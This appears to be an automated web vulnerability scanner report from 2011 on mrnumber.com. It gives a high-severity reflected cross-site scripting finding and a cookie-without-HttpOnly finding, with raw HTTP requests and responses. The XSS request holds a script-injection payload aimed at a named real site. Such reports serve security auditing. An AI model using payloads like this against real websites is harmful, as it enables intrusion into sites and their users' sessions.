1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://mrnumber.com |
Path: | /1-613-617 |
GET /1-613-6171daad"><script>alert(1)< Host: mrnumber.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-type: text/html; charset=UTF-8 Cache-control: max-age=0 Cache-control: must-revalidate Expires: Wed, 05 Jan 2011 17:27:20 +0000 Set-cookie: uid=7z2w4mkdyt098gry Content-Length: 7904 Date: Wed, 05 Jan 2011 17:27:20 GMT Connection: close Server: Ocamlnet/2.2.9 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <link rel="alternate" media="handheld" href="http://m.mrnumber ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mrnumber.com |
Path: | /1-613-617 |
GET /1-613-617 HTTP/1.1 Host: mrnumber.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-type: text/html; charset=UTF-8 Cache-control: max-age=0 Cache-control: must-revalidate Expires: Wed, 05 Jan 2011 17:27:09 +0000 Set-cookie: uid=n1bs951xwy54z75c Content-Length: 32232 Date: Wed, 05 Jan 2011 17:27:09 GMT Connection: close Server: Ocamlnet/2.2.9 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |